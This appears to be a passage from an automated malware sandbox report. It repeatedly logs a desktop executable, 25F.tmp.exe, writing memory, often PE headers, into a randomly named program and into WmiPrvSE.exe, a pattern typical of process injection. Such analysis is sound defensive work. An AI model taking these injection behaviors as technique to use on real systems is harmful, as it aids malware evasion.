            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 90000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 5D0000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 90000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 910000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 390000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 90000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 220000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 150000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 7F0000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 250000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 260000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 3F0000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 3F0000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 280000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 100000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 260000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 5D0000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 1C0000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 230000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 90000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 250000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 100000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 2A0000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 270000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 2B0000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 90000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 2D0000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 150000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 750000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 120000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 550000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 250000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 2E0000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 390000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 1B0000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 100000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 380000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 820000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 380000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 3E0000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 280000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 5F0000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 2B0000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 8A0000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 100000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 1D0000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 180000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 1C0000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 8E0000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 410000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 140000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 3A0000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 160000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 140000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 190000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 100000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 1B0000
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: C50000
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 180000
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 3D0000
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 180000
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 380000
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 180000
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 410000
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 1B0000
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 350000
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 310000
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 130000
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 380000
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 100000
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 100000
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 210000
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 220000
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 1B0000
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 320000
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: C0000
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 510000
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 190000
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 840000
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 400000
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 90000
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 820000
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 90000
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 180000
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 5D0000
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 90000
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 910000
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 390000
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 90000
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 220000
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 150000
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 130000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 7F0000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 180000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 250000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 260000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 3F0000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 3F0000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 280000Jump to behavior
